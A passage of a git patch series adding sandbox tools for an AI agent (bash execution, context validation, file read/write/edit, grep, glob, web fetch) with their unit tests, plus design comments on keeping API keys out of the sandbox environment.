+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("getSandbox", () => {
+  it("reconnects via connectVercel(state) and returns the sandbox", async () => {
+    const fakeSandbox = { workingDirectory: "/sandbox/mono" };
+    vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never);
+    const state = { sandboxName: "session-xyz" };
+    const result = await getSandbox(
+      { sandbox: { state, workingDirectory: "/sandbox/mono" } },
+      "bash",
+    );
+    expect(result).toBe(fakeSandbox);
+    expect(connectVercel).toHaveBeenCalledWith(state);
+  });
+
+  it("throws a descriptive error when context is missing entirely", async () => {
+    await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/);
+  });
+
+  it("throws when sandbox.state is missing", async () => {
+    await expect(
+      getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"),
+    ).rejects.toThrow(/Sandbox state missing/);
+  });
+
+  it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => {
+    await expect(
+      getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"),
+    ).rejects.toThrow(/Sandbox state missing/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts
new file mode 100644
index 000000000..29ad4f29d
--- /dev/null
+++ b/lib/agent/tools/__tests__/isAgentContext.test.ts
@@ -0,0 +1,42 @@
+import { describe, it, expect } from "vitest";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+describe("isAgentContext", () => {
+  it("returns true for a well-formed context", () => {
+    expect(
+      isAgentContext({
+        sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+      }),
+    ).toBe(true);
+  });
+
+  it("returns false for non-object inputs", () => {
+    expect(isAgentContext(undefined)).toBe(false);
+    expect(isAgentContext(null)).toBe(false);
+    expect(isAgentContext("nope")).toBe(false);
+    expect(isAgentContext(42)).toBe(false);
+  });
+
+  it("returns false when sandbox is missing", () => {
+    expect(isAgentContext({})).toBe(false);
+  });
+
+  it("returns false when sandbox is null", () => {
+    expect(isAgentContext({ sandbox: null })).toBe(false);
+  });
+
+  it("returns false when sandbox is empty (missing state and workingDirectory)", () => {
+    expect(isAgentContext({ sandbox: {} })).toBe(false);
+  });
+
+  it("returns false when sandbox.state is missing or null", () => {
+    expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false);
+  });
+
+  it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => {
+    expect(isAgentContext({ sandbox: { state: {} } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false);
+  });
+});
diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts
new file mode 100644
index 000000000..908113812
--- /dev/null
+++ b/lib/agent/tools/bashTool.ts
@@ -0,0 +1,116 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+
+const TIMEOUT_MS = 120_000;
+
+const bashInputSchema = z.object({
+  command: z.string().describe("The bash command to execute"),
+  cwd: z
+    .string()
+    .optional()
+    .describe("Workspace-relative working directory for the command (e.g., apps/web)"),
+  detached: z
+    .boolean()
+    .optional()
+    .describe(
+      "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). The command starts and returns immediately without waiting for it to finish.",
+    ),
+});
+
+/**
+ * Factory for the `bash` sandbox tool. Runs `bash -c "<command>"` inside
+ * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's
+ * working directory.
+ *
+ * Approval gating is intentionally absent — model-issued commands are
+ * trusted in this PR. Add a host-side gate at the route/UI layer if that
+ * changes.
+ *
+ * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the
+ * sandbox is org-scoped) so future `recoup-api` skill calls can scope to
+ * the right org. Detached execs deliberately skip env injection — those
+ * processes outlive the prompt.
+ */
+export const bashTool = () =>
+  tool({
+    description: `Execute a bash command in the user's shell (non-interactive).
+
+WHEN TO USE:
+- Running existing project commands (build, test, lint, typecheck)
+- Using read-only CLI tools (git status, git diff, ls, etc.)
+- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task
+
+WHEN NOT TO USE:
+- Reading files (use the file read tool instead, once available)
+- Editing or creating files (use file edit/write tools, once available)
+- Searching code or text (use grep / glob tools, once available)
+- Interactive commands (shells, editors, REPLs)
+
+USAGE:
+- Runs bash -c "<command>" in a non-interactive shell (no TTY/PTY)
+- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&"
+- Use the cwd parameter ONLY with a workspace-relative subdirectory
+- Commands automatically timeout after ~2 minutes
+- Combined stdout/stderr output is truncated after ~50,000 characters
+
+IMPORTANT:
+- Never chain commands with ';' or '&&' — use separate tool calls
+- Never use interactive commands (vim, nano, top, bash, ssh, etc.)
+- Always quote file paths that may contain spaces
+- Use detached: true to start dev servers / long-running processes in the background`,
+    inputSchema: bashInputSchema,
+    execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
+      const sandbox = await getSandbox(experimental_context, "bash");
+      const workingDirectory = sandbox.workingDirectory;
+      const workingDir = cwd
+        ? path.isAbsolute(cwd)
+          ? cwd
+          : path.resolve(workingDirectory, cwd)
+        : workingDirectory;
+
+      if (detached) {
+        if (!sandbox.execDetached) {
+          return {
+            success: false,
+            exitCode: null,
+            stdout: "",
+            stderr:
+              "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
+          };
+        }
+        try {
+          const { commandId } = await sandbox.execDetached(command, workingDir);
+          return {
+            success: true,
+            exitCode: null,
+            stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
+            stderr: "",
+          };
+        } catch (error) {
+          return {
+            success: false,
+            exitCode: null,
+            stdout: "",
+            stderr: error instanceof Error ? error.message : String(error),
+          };
+        }
+      }
+
+      const recoupEnv = buildRecoupExecEnv(experimental_context);
+      const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
+        signal: abortSignal,
+        ...(recoupEnv ? { env: recoupEnv } : {}),
+      });
+
+      return {
+        success: result.success,
+        exitCode: result.exitCode,
+        stdout: result.stdout,
+        stderr: result.stderr,
+        ...(result.truncated && { truncated: true }),
+      };
+    },
+  });
diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts
new file mode 100644
index 000000000..6eaf3015f
--- /dev/null
+++ b/lib/agent/tools/buildRecoupExecEnv.ts
@@ -0,0 +1,30 @@
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Build a per-invocation env override carrying Recoupable sandbox context
+ * so outbound shell commands (curl, scripts, the `recoup-api` skill) can
+ * scope requests correctly without any state persisting on the sandbox.
+ *
+ * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token
+ * injection is deliberately NOT included here; a long-lived api key in the
+ * sandbox env would be readable by any model-issued bash command. Proper
+ * short-lived token minting will land alongside the `skill` tool port
+ * (when there's an actual consumer for it).
+ *
+ * Returns `undefined` when nothing is available to inject so callers can
+ * cleanly spread a conditional `...(env ? { env } : {})` into exec opts.
+ *
+ * @param experimental_context - The opaque context object passed by AI SDK to tool execute.
+ */
+export function buildRecoupExecEnv(
+  experimental_context: unknown,
+): Record<string, string> | undefined {
+  if (!isAgentContext(experimental_context)) return undefined;
+
+  const env: Record<string, string> = {};
+  if (experimental_context.recoupOrgId) {
+    env.RECOUP_ORG_ID = experimental_context.recoupOrgId;
+  }
+
+  return Object.keys(env).length > 0 ? env : undefined;
+}
diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts
new file mode 100644
index 000000000..be6c46605
--- /dev/null
+++ b/lib/agent/tools/getSandbox.ts
@@ -0,0 +1,28 @@
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Resolve a connected `Sandbox` instance from `experimental_context`.
+ * Reconnects each call via `connectVercel(state)` rather than caching the
+ * handle on context — workflow durability requires that side-effecting
+ * resources (sandbox sessions) be re-acquired inside the step that uses
+ * them, not passed across event boundaries.
+ *
+ * @param experimental_context - The opaque context object passed by AI SDK to tool execute.
+ * @param toolName - Optional tool name to surface in error messages.
+ */
+export async function getSandbox(
+  experimental_context: unknown,
+  toolName?: string,
+): Promise<Sandbox> {
+  if (!isAgentContext(experimental_context)) {
+    const where = toolName ? ` (tool: ${toolName})` : "";
+    throw new Error(
+      `Sandbox state missing from agent context${where}. ` +
+        "Ensure the workflow start payload includes `sandbox.state` and that " +
+        "runAgentStep threads it via experimental_context.",
+    );
+  }
+  return connectVercel(experimental_context.sandbox.state);
+}
diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts
new file mode 100644
index 000000000..0049ac010
--- /dev/null
+++ b/lib/agent/tools/isAgentContext.ts
@@ -0,0 +1,26 @@
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
+
+/**
+ * Type-guard that confirms an arbitrary `experimental_context` shape has
+ * the AgentContext fields tools rely on at runtime. Validates each required
+ * leaf (sandbox object, state object, non-empty workingDirectory) so callers
+ * can trust the narrowed type — earlier weaker guards returned true for
+ * `{ sandbox: null }` or `{ sandbox: {} }`, letting tools later crash on
+ * "cannot read .x of undefined".
+ *
+ * @param value - The opaque context object passed by AI SDK to tool execute.
+ */
+export function isAgentContext(value: unknown): value is AgentContext {
+  if (typeof value !== "object" || value === null) return false;
+
+  const candidate = value as { sandbox?: unknown };
+  const sandbox = candidate.sandbox;
+  if (typeof sandbox !== "object" || sandbox === null) return false;
+
+  const sandboxFields = sandbox as { state?: unknown; workingDirectory?: unknown };
+  if (typeof sandboxFields.state !== "object" || sandboxFields.state === null) return false;
+  if (typeof sandboxFields.workingDirectory !== "string") return false;
+  if (sandboxFields.workingDirectory.length === 0) return false;
+
+  return true;
+}
diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts
index 7c2c9407b..e4bc4fc56 100644
--- a/lib/agents/generalAgent/getGeneralAgent.ts
+++ b/lib/agents/generalAgent/getGeneralAgent.ts
@@ -1,4 +1,5 @@
-import { stepCountIs, ToolLoopAgent } from "ai";
+import { ToolLoopAgent } from "ai";
+import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { AnthropicProviderOptions } from "@ai-sdk/anthropic";
 import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google";
 import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai";
@@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise<Ro
 
   const tools = await setupToolsForRequest(body);
   const model = bodyModel || DEFAULT_MODEL;
-  const stopWhen = stepCountIs(111);
+  const stopWhen = CHAT_AGENT_STOP_WHEN;
 
   const agent = new ToolLoopAgent({
     model,
diff --git a/lib/chat/const.ts b/lib/chat/const.ts
index 0ff8cbd2b..54daa63d4 100644
--- a/lib/chat/const.ts
+++ b/lib/chat/const.ts
@@ -1,5 +1,18 @@
+import { stepCountIs } from "ai";
+
 export const MAX_MESSAGES = 55;
 
+/**
+ * Stop condition for multi-step chat agent loops (model → tool → model → …).
+ * Used by /api/chat (via getGeneralAgent) and /api/chat/workflow (via
+ * runAgentStep). 111 is high enough that normal flows never hit the cap
+ * but bounds runaway loops for cost / replay safety.
+ *
+ * Single-shot agents (compact, content, email-reply) use `stepCountIs(1)`
+ * directly — they're not in the multi-step family.
+ */
+export const CHAT_AGENT_STOP_WHEN = stepCountIs(111);
+
 export const SYSTEM_PROMPT = `You are Recoup, a friendly, sharp, and strategic AI assistant for the music industry. You help music executives, artist teams, and self-starting artists analyze fan data, optimize marketing, and grow artist careers.
 
 ---
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index dcaad8585..6ceb0c867 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -13,6 +13,9 @@ import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
 import { errorResponse } from "@/lib/networking/errorResponse";
 import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
 import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
+import { extractOrgId } from "@/lib/recoupable/extractOrgId";
+import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants";
+import type { VercelState } from "@/lib/sandbox/vercel/state";
 import generateUUID from "@/lib/uuid/generateUUID";
 
 const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
@@ -84,12 +87,29 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   void persistLatestUserMessage(validated.chatId, validated.messages as never);
 
   const modelId = chat.model_id ?? DEFAULT_MODEL_ID;
+  const recoupOrgId = session.clone_url
+    ? (extractOrgId(session.clone_url) ?? undefined)
+    : undefined;
   const run = await start(runAgentWorkflow, [
     {
       messages: validated.messages,
       chatId: validated.chatId,
       sessionId: validated.sessionId,
       modelId,
+      agentContext: {
+        sandbox: {
+          state: session.sandbox_state as VercelState,
+          // Slim PR 4 ships the default working directory. Per-session
+          // overrides land when createChatRuntime is ported alongside
+          // the rest of the tool surface.
+          workingDirectory: DEFAULT_WORKING_DIRECTORY,
+        },
+        recoupOrgId,
+        // No `recoupAccessToken`: handing the long-lived api key to bash
+        // would let any model-issued command exfiltrate it via env. Proper
+        // short-lived token minting lands alongside the `skill` tool port
+        // (when there's an actual consumer for it).
+      },
     },
   ]);
 

From 51fd649945376a0d0cc4a87a3c172ae91f528d0e Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 13:49:12 -0500
Subject: [PATCH 04/10] =?UTF-8?q?feat(chat-workflow):=20port=207=20leaf=20?=
 =?UTF-8?q?sandbox=20tools=20=E2=80=94=20read/write/edit/grep=E2=80=A6=20(?=
 =?UTF-8?q?#585)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 lib/agent/__tests__/buildAgentTools.test.ts   |  34 +++-
 lib/agent/buildAgentTools.ts                  |  29 ++-
 lib/agent/tools/__tests__/bashTool.test.ts    |  14 +-
 .../tools/__tests__/editFileTool.test.ts      |  86 +++++++++
 lib/agent/tools/__tests__/globTool.test.ts    |  97 ++++++++++
 lib/agent/tools/__tests__/grepTool.test.ts    | 103 +++++++++++
 .../tools/__tests__/readFileTool.test.ts      |  89 ++++++++++
 lib/agent/tools/__tests__/shellEscape.test.ts |  20 +++
 .../tools/__tests__/toDisplayPath.test.ts     |  29 +++
 .../tools/__tests__/todoWriteTool.test.ts     |  28 +++
 .../tools/__tests__/webFetchTool.test.ts      |  96 ++++++++++
 .../tools/__tests__/writeFileTool.test.ts     |  52 ++++++
 lib/agent/tools/bashTool.ts                   | 109 ++++++------
 lib/agent/tools/editFileTool.ts               | 100 +++++++++++
 lib/agent/tools/globTool.ts                   | 165 ++++++++++++++++++
 lib/agent/tools/grepTool.ts                   | 143 +++++++++++++++
 lib/agent/tools/readFileTool.ts               |  70 ++++++++
 lib/agent/tools/shellEscape.ts                |  14 ++
 lib/agent/tools/toDisplayPath.ts              |  34 ++++
 lib/agent/tools/todoWriteTool.ts              |  65 +++++++
 lib/agent/tools/webFetchTool.ts               | 124 +++++++++++++
 lib/agent/tools/writeFileTool.ts              |  65 +++++++
 22 files changed, 1491 insertions(+), 75 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/editFileTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/globTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/grepTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/readFileTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/shellEscape.test.ts
 create mode 100644 lib/agent/tools/__tests__/toDisplayPath.test.ts
 create mode 100644 lib/agent/tools/__tests__/todoWriteTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/webFetchTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/writeFileTool.test.ts
 create mode 100644 lib/agent/tools/editFileTool.ts
 create mode 100644 lib/agent/tools/globTool.ts
 create mode 100644 lib/agent/tools/grepTool.ts
 create mode 100644 lib/agent/tools/readFileTool.ts
 create mode 100644 lib/agent/tools/shellEscape.ts
 create mode 100644 lib/agent/tools/toDisplayPath.ts
 create mode 100644 lib/agent/tools/todoWriteTool.ts
 create mode 100644 lib/agent/tools/webFetchTool.ts
 create mode 100644 lib/agent/tools/writeFileTool.ts

diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index 52479cad0..5478c59ca 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,17 +1,35 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
+const EXPECTED_TOOL_NAMES = [
+  "bash",
+  "read",
+  "write",
+  "edit",
+  "grep",
+  "glob",
+  "todo_write",
+  "web_fetch",
+] as const;
+
 describe("buildAgentTools", () => {
-  it("returns a tools record keyed by tool name", () => {
+  it("returns a tools record with all 8 leaf tools registered", () => {
     const tools = buildAgentTools();
-    expect(tools).toHaveProperty("bash");
-    expect(typeof tools.bash).toBe("object");
+    for (const name of EXPECTED_TOOL_NAMES) {
+      expect(tools).toHaveProperty(name);
+    }
   });
 
-  it("each tool has an inputSchema, description, and execute", () => {
-    const tools = buildAgentTools();
-    expect(tools.bash.inputSchema).toBeDefined();
-    expect(tools.bash.description).toBeDefined();
-    expect(typeof tools.bash.execute).toBe("function");
+  it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
+    const tools = buildAgentTools() as Record<
+      string,
+      { description?: unknown; inputSchema?: unknown; execute?: unknown }
+    >;
+    for (const name of EXPECTED_TOOL_NAMES) {
+      const t = tools[name]!;
+      expect(typeof t.description).toBe("string");
+      expect(t.inputSchema).toBeDefined();
+      expect(typeof t.execute).toBe("function");
+    }
   });
 });
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index be6bde085..f9cbc2b39 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -1,4 +1,11 @@
 import { bashTool } from "@/lib/agent/tools/bashTool";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { globTool } from "@/lib/agent/tools/globTool";
+import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
+import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
 
 /**
  * Factory for the full agent tool set passed into `streamText({ tools })`.
@@ -6,14 +13,26 @@ import { bashTool } from "@/lib/agent/tools/bashTool";
  * at execute time — the factory takes no arguments because the tools are
  * stateless modulo that context.
  *
- * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`,
- * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`,
- * `fetch`) port in follow-up PRs and slot into this record one-by-one
- * without changing the factory signature.
+ * Currently ships 8 leaf tools:
+ *   - bash, read, write, edit, grep, glob (sandbox / file ops)
+ *   - todo_write (planning surface; stateless, echoes the list back)
+ *   - web_fetch (HTTP via curl inside the sandbox)
+ *
+ * Composite tools (`task` subagent, `ask_user_question` UI part,
+ * `skill` skill discovery) port in a follow-up PR — they require
+ * subagent context plumbing / UI rendering / skill discovery infra
+ * that isn't in api today.
  */
 export function buildAgentTools() {
   return {
-    bash: bashTool(),
+    bash: bashTool,
+    read: readFileTool,
+    write: writeFileTool,
+    edit: editFileTool,
+    grep: grepTool,
+    glob: globTool,
+    todo_write: todoWriteTool,
+    web_fetch: webFetchTool,
   };
 }
 
diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts
index da9a999d3..568a7f72d 100644
--- a/lib/agent/tools/__tests__/bashTool.test.ts
+++ b/lib/agent/tools/__tests__/bashTool.test.ts
@@ -34,7 +34,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = await tool.execute!({ command: "ls" }, {
       experimental_context: baseContext,
     } as never);
@@ -64,7 +64,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "find ." }, {
       experimental_context: baseContext,
     } as never)) as { truncated?: boolean };
@@ -83,7 +83,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "ls", cwd: "apps/web" }, {
       experimental_context: baseContext,
     } as never);
@@ -107,7 +107,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "curl example.com" }, {
       experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
     } as never);
@@ -121,7 +121,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: baseContext,
     } as never)) as { success: boolean; stdout: string };
@@ -134,7 +134,7 @@ describe("bashTool.execute", () => {
     const sandbox = makeSandbox({ execDetached: undefined });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: baseContext,
     } as never)) as { success: boolean; stderr: string };
@@ -148,7 +148,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
     } as never);
diff --git a/lib/agent/tools/__tests__/editFileTool.test.ts b/lib/agent/tools/__tests__/editFileTool.test.ts
new file mode 100644
index 000000000..3a2cac81d
--- /dev/null
+++ b/lib/agent/tools/__tests__/editFileTool.test.ts
@@ -0,0 +1,86 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(initialContent: string) {
+  let stored = initialContent;
+  return {
+    workingDirectory: "/sandbox/mono",
+    readFile: vi.fn(async () => stored),
+    writeFile: vi.fn(async (_path: string, content: string) => {
+      stored = content;
+    }),
+    getStored: () => stored,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("editFileTool", () => {
+  it("replaces a unique oldString once and reports the startLine", async () => {
+    const sb = makeSandbox("line one\nold value\nline three");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "old value", newString: "new value" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; replacements: number; startLine: number };
+    expect(result.success).toBe(true);
+    expect(result.replacements).toBe(1);
+    expect(result.startLine).toBe(2);
+    expect(sb.getStored()).toBe("line one\nnew value\nline three");
+  });
+
+  it("rejects when oldString === newString (no-op)", async () => {
+    const sb = makeSandbox("anything");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!({ filePath: "a.txt", oldString: "x", newString: "x" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/must be different/);
+  });
+
+  it("rejects when oldString is not in the file", async () => {
+    const sb = makeSandbox("hello world");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "missing", newString: "other" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/not found/);
+  });
+
+  it("rejects ambiguous edits (multiple matches without replaceAll)", async () => {
+    const sb = makeSandbox("foo\nfoo\nbar");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!({ filePath: "a.txt", oldString: "foo", newString: "baz" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/2 times/);
+  });
+
+  it("replaces all occurrences when replaceAll:true", async () => {
+    const sb = makeSandbox("foo bar foo baz foo");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "foo", newString: "qux", replaceAll: true },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; replacements: number };
+    expect(result.success).toBe(true);
+    expect(result.replacements).toBe(3);
+    expect(sb.getStored()).toBe("qux bar qux baz qux");
+  });
+});
diff --git a/lib/agent/tools/__tests__/globTool.test.ts b/lib/agent/tools/__tests__/globTool.test.ts
new file mode 100644
index 000000000..3f35d0a71
--- /dev/null
+++ b/lib/agent/tools/__tests__/globTool.test.ts
@@ -0,0 +1,97 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { globTool } from "@/lib/agent/tools/globTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(exec: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", exec };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("globTool", () => {
+  it("parses `mtime\\tsize\\tpath` output into structured file entries", async () => {
+    // Two files, newest first (sort already happens server-side in the command).
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout:
+          "1700000000.0\t512\t/sandbox/mono/src/index.ts\n1699999000.5\t256\t/sandbox/mono/src/util.ts",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    const result = (await tool.execute!({ pattern: "**/*.ts" }, {
+      experimental_context: ctx,
+    } as never)) as {
+      success: boolean;
+      count: number;
+      files: Array<{ path: string; size: number; modifiedAt: string }>;
+    };
